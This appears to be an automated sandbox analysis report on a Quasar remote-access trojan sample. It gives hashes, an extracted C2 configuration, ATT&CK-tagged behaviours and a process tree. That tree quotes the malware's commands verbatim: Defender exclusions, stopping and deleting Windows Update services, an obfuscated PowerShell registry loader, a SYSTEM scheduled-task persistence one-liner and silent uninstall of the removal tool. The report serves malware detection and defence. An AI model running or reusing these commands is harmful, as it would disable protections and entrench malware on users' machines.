quasar | 210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba

Analysis

max time kernel
19s
max time network
148s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
03-01-2025 03:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe
Size

6.0MB
MD5

13b0dec8a2c9291ec13ca9d0f1a98b33
SHA1

762c7072179bce1822999dc30c6252262caf6c00
SHA256

210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba
SHA512

b8b97a630c6f4eca602c756a5a1c29e1cc3354db29176a5b34cb92fd10b14665bde82d01f97c65fbdec3db343e20f6ec67a9e1d3db9c16c280f2e8962d144346
SSDEEP

98304:j3GflC+i0bBHXGgjaQx+OhfzTxzdloaDU5BKtxo5fQIwuhkNUwZ:j3GtCj0bR2Ej1hbTxkfzKYAEkXZ

Score

10^/10

quasar 4drun defense_evasion discovery evasion execution persistence spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

4Drun

185.148.3.216:4000

Mutex

c3557859-56ac-475e-b44d-e1b60c20d0d0

Attributes

encryption_key
B000736BEBDF08FC1B6696200651882CF57E43E7
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
3dfx Startup
subdirectory
SubDir

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 3 IoCs

resource	yara_rule
behavioral1/files/0x0007000000018741-27.dat	family_quasar
behavioral1/memory/2604-29-0x0000000000850000-0x00000000008D4000-memory.dmp	family_quasar
behavioral1/memory/2584-35-0x0000000001230000-0x00000000012B4000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1236 created 432	1236	powershell.EXE	5

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1308	powershell.exe
1728	powershell.exe
2640	powershell.exe
2976	powershell.exe
2948	powershell.exe
2248	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 5 IoCs

pid	Process
2844	gfiKDLgr58thy4d.exe
2688	GR55Qg1hth.exe
2604	F4R5fd8grr.exe
2584	Client.exe
2524	Bara.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx	svchost.exe

Loads dropped DLL 4 IoCs

pid	Process
2160	210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe
2160	210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe
2160	210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe
1256	taskeng.exe

Power Settings 1 TTPs 18 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2272	powercfg.exe
2140	powercfg.exe
2836	powercfg.exe
876	powercfg.exe
624	powercfg.exe
988	cmd.exe
2872	cmd.exe
2888	powercfg.exe
1944	powercfg.exe
1940	powercfg.exe
1260	powercfg.exe
2720	powercfg.exe
3008	powercfg.exe
1604	powercfg.exe
296	powercfg.exe
1208	powercfg.exe
1480	powercfg.exe
2492	powercfg.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	gfiKDLgr58thy4d.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2688 set thread context of 3028	2688	GR55Qg1hth.exe	64
PID 1236 set thread context of 1468	1236	powershell.EXE	74
PID 2844 set thread context of 2520	2844	gfiKDLgr58thy4d.exe	92

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Cuis\bon\Bara.exe	GR55Qg1hth.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Tasks\dialersvc64.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	svchost.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File created	C:\Windows\Tasks\dialersvc64.job	dialer.exe

Launches sc.exe 24 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2348	sc.exe
2308	sc.exe
1736	sc.exe
3028	sc.exe
1668	sc.exe
2696	sc.exe
2724	sc.exe
1764	sc.exe
2772	sc.exe
320	sc.exe
1040	sc.exe
2232	sc.exe
300	sc.exe
2932	sc.exe
2228	sc.exe
2140	sc.exe
2640	sc.exe
1924	sc.exe
1848	sc.exe
2784	sc.exe
2796	sc.exe
2016	sc.exe
2900	sc.exe
1944	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2704	WMIC.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 4034f1038e5ddb01	powershell.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1660	schtasks.exe
2832	schtasks.exe
1776	schtasks.exe
2096	schtasks.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs

pid	Process
2844	gfiKDLgr58thy4d.exe
1728	powershell.exe
2948	powershell.exe
2204	powershell.exe
1236	powershell.EXE
1236	powershell.EXE
1468	dllhost.exe
1468	dllhost.exe
1468	dllhost.exe
1468	dllhost.exe
1308	powershell.exe
1656	powershell.EXE
1468	dllhost.exe
1468	dllhost.exe
1468	dllhost.exe
1468	dllhost.exe
1468	dllhost.exe
1468	dllhost.exe
2584	Client.exe
1468	dllhost.exe
1468	dllhost.exe
2844	gfiKDLgr58thy4d.exe
2844	gfiKDLgr58thy4d.exe
2844	gfiKDLgr58thy4d.exe
2844	gfiKDLgr58thy4d.exe
2844	gfiKDLgr58thy4d.exe
2844	gfiKDLgr58thy4d.exe
2844	gfiKDLgr58thy4d.exe
2844	gfiKDLgr58thy4d.exe
2844	gfiKDLgr58thy4d.exe
2844	gfiKDLgr58thy4d.exe
2844	gfiKDLgr58thy4d.exe
2844	gfiKDLgr58thy4d.exe
2520	dialer.exe
2520	dialer.exe
2520	dialer.exe
2520	dialer.exe
2844	gfiKDLgr58thy4d.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

description	pid	Process
Token: SeDebugPrivilege	2604	F4R5fd8grr.exe
Token: SeDebugPrivilege	2584	Client.exe
Token: SeDebugPrivilege	1728	powershell.exe
Token: SeShutdownPrivilege	2888	powercfg.exe
Token: SeDebugPrivilege	2948	powershell.exe
Token: SeShutdownPrivilege	1944	powercfg.exe
Token: SeShutdownPrivilege	1940	powercfg.exe
Token: SeShutdownPrivilege	1260	powercfg.exe
Token: SeDebugPrivilege	2204	powershell.exe
Token: SeDebugPrivilege	1236	powershell.EXE
Token: SeDebugPrivilege	1236	powershell.EXE
Token: SeDebugPrivilege	1468	dllhost.exe
Token: SeShutdownPrivilege	1124	Explorer.EXE
Token: SeShutdownPrivilege	1124	Explorer.EXE
Token: SeAuditPrivilege	844	svchost.exe
Token: SeDebugPrivilege	1308	powershell.exe
Token: SeDebugPrivilege	1656	powershell.EXE
Token: SeDebugPrivilege	2844	gfiKDLgr58thy4d.exe
Token: SeDebugPrivilege	2520	dialer.exe
Token: SeShutdownPrivilege	296	powercfg.exe
Token: SeShutdownPrivilege	1208	powercfg.exe
Token: SeShutdownPrivilege	1604	powercfg.exe
Token: SeShutdownPrivilege	1480	powercfg.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2584	Client.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2160 wrote to memory of 2844	2160	210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe	31
PID 2160 wrote to memory of 2844	2160	210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe	31
PID 2160 wrote to memory of 2844	2160	210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe	31
PID 2160 wrote to memory of 2688	2160	210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe	32
PID 2160 wrote to memory of 2688	2160	210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe	32
PID 2160 wrote to memory of 2688	2160	210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe	32
PID 2160 wrote to memory of 2604	2160	210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe	33
PID 2160 wrote to memory of 2604	2160	210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe	33
PID 2160 wrote to memory of 2604	2160	210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe	33
PID 2604 wrote to memory of 2832	2604	F4R5fd8grr.exe	34
PID 2604 wrote to memory of 2832	2604	F4R5fd8grr.exe	34
PID 2604 wrote to memory of 2832	2604	F4R5fd8grr.exe	34
PID 2604 wrote to memory of 2584	2604	F4R5fd8grr.exe	36
PID 2604 wrote to memory of 2584	2604	F4R5fd8grr.exe	36
PID 2604 wrote to memory of 2584	2604	F4R5fd8grr.exe	36
PID 2584 wrote to memory of 1776	2584	Client.exe	37
PID 2584 wrote to memory of 1776	2584	Client.exe	37
PID 2584 wrote to memory of 1776	2584	Client.exe	37
PID 2688 wrote to memory of 1728	2688	GR55Qg1hth.exe	41
PID 2688 wrote to memory of 1728	2688	GR55Qg1hth.exe	41
PID 2688 wrote to memory of 1728	2688	GR55Qg1hth.exe	41
PID 2688 wrote to memory of 2752	2688	GR55Qg1hth.exe	43
PID 2688 wrote to memory of 2752	2688	GR55Qg1hth.exe	43
PID 2688 wrote to memory of 2752	2688	GR55Qg1hth.exe	43
PID 2688 wrote to memory of 2872	2688	GR55Qg1hth.exe	44
PID 2688 wrote to memory of 2872	2688	GR55Qg1hth.exe	44
PID 2688 wrote to memory of 2872	2688	GR55Qg1hth.exe	44
PID 2688 wrote to memory of 2948	2688	GR55Qg1hth.exe	45
PID 2688 wrote to memory of 2948	2688	GR55Qg1hth.exe	45
PID 2688 wrote to memory of 2948	2688	GR55Qg1hth.exe	45
PID 2752 wrote to memory of 1924	2752	cmd.exe	49
PID 2752 wrote to memory of 1924	2752	cmd.exe	49
PID 2752 wrote to memory of 1924	2752	cmd.exe	49
PID 2872 wrote to memory of 2888	2872	cmd.exe	50
PID 2872 wrote to memory of 2888	2872	cmd.exe	50
PID 2872 wrote to memory of 2888	2872	cmd.exe	50
PID 2752 wrote to memory of 2900	2752	cmd.exe	51
PID 2752 wrote to memory of 2900	2752	cmd.exe	51
PID 2752 wrote to memory of 2900	2752	cmd.exe	51
PID 2752 wrote to memory of 1848	2752	cmd.exe	52
PID 2752 wrote to memory of 1848	2752	cmd.exe	52
PID 2752 wrote to memory of 1848	2752	cmd.exe	52
PID 2872 wrote to memory of 1944	2872	cmd.exe	53
PID 2872 wrote to memory of 1944	2872	cmd.exe	53
PID 2872 wrote to memory of 1944	2872	cmd.exe	53
PID 2752 wrote to memory of 1736	2752	cmd.exe	54
PID 2752 wrote to memory of 1736	2752	cmd.exe	54
PID 2752 wrote to memory of 1736	2752	cmd.exe	54
PID 2872 wrote to memory of 1940	2872	cmd.exe	55
PID 2872 wrote to memory of 1940	2872	cmd.exe	55
PID 2872 wrote to memory of 1940	2872	cmd.exe	55
PID 2752 wrote to memory of 320	2752	cmd.exe	56
PID 2752 wrote to memory of 320	2752	cmd.exe	56
PID 2752 wrote to memory of 320	2752	cmd.exe	56
PID 2872 wrote to memory of 1260	2872	cmd.exe	57
PID 2872 wrote to memory of 1260	2872	cmd.exe	57
PID 2872 wrote to memory of 1260	2872	cmd.exe	57
PID 2752 wrote to memory of 1648	2752	cmd.exe	58
PID 2752 wrote to memory of 1648	2752	cmd.exe	58
PID 2752 wrote to memory of 1648	2752	cmd.exe	58
PID 2948 wrote to memory of 2096	2948	powershell.exe	59
PID 2948 wrote to memory of 2096	2948	powershell.exe	59
PID 2948 wrote to memory of 2096	2948	powershell.exe	59
PID 2752 wrote to memory of 2116	2752	cmd.exe	60

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:432
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{af0644fc-41ac-43c5-ad78-b72598df6cfb}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1468
- C:\Windows\SysWOW64\dllhost.exe
  C:\Windows\SysWOW64\dllhost.exe /Processid:{9b83b024-b815-44d4-9736-cb181a8431fa}
  2⤵
  PID:752

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:476
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:592
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe
    3⤵
    PID:1344
- - C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    3⤵
    PID:1472
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:672
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  - Indicator Removal: Clear Windows Event Logs
  PID:756
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:808
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1056
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  PID:844
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {B4C3596B-952B-489E-9B29-7C5988566F0E} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    - Loads dropped DLL
    PID:1256
  - - C:\Program Files\Cuis\bon\Bara.exe
      "C:\Program Files\Cuis\bon\Bara.exe"
      4⤵
      Executes dropped EXE
      PID:2524
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2976
    - - C:\Windows\system32\cmd.exe
        
        cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        5⤵
        
        PID:2512
      - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:2796
      - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:2640
      - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:1764
      - C:\Windows\system32\sc.exe
        
        sc stop bits
        6⤵
        Launches sc.exe
        
        PID:2772
      - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        6⤵
        Launches sc.exe
        
        PID:2016
    - - C:\Windows\system32\cmd.exe
        
        cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        5⤵
        Power Settings
        
        PID:988
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        6⤵
        Power Settings
        
        PID:2720
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        6⤵
        Power Settings
        
        PID:2140
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        6⤵
        Power Settings
        
        PID:3008
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        6⤵
        Power Settings
        
        PID:2836
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2248
      - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn Barac /tr "'C:\Program Files\Cuis\bon\Bara.exe'"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1660
    - - C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe ujznpffbjbh
        5⤵
        
        PID:2268
    - - C:\Windows\system32\cmd.exe
        
        cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        5⤵
        
        PID:2324
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Name, VideoProcessor
        6⤵
        Detects videocard installed
        
        PID:2704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1236
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
      4⤵
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1656
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:960
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:236
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1048
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:1076
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1156
- C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
  "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
  2⤵
  PID:2044
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:1772
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:3004
- C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
  C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
  2⤵
  PID:2180
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2216
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:1520
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2724
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2308
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2140
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:1944
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:2784
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:2492
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:876
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:624
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:2272
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    PID:2880
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    PID:3036
- - C:\Windows\system32\dialer.exe
    dialer.exe
    3⤵
    PID:1716

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:492

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:500

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1124
- C:\Users\Admin\AppData\Local\Temp\210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe
  "C:\Users\Admin\AppData\Local\Temp\210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2160
- - C:\Users\Admin\AppData\Local\Temp\gfiKDLgr58thy4d.exe
    "C:\Users\Admin\AppData\Local\Temp\gfiKDLgr58thy4d.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2844
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1308
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:1176
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:1696
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:2232
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:3028
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:1040
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:300
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:2348
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:1604
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:296
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:1208
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:1480
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2520
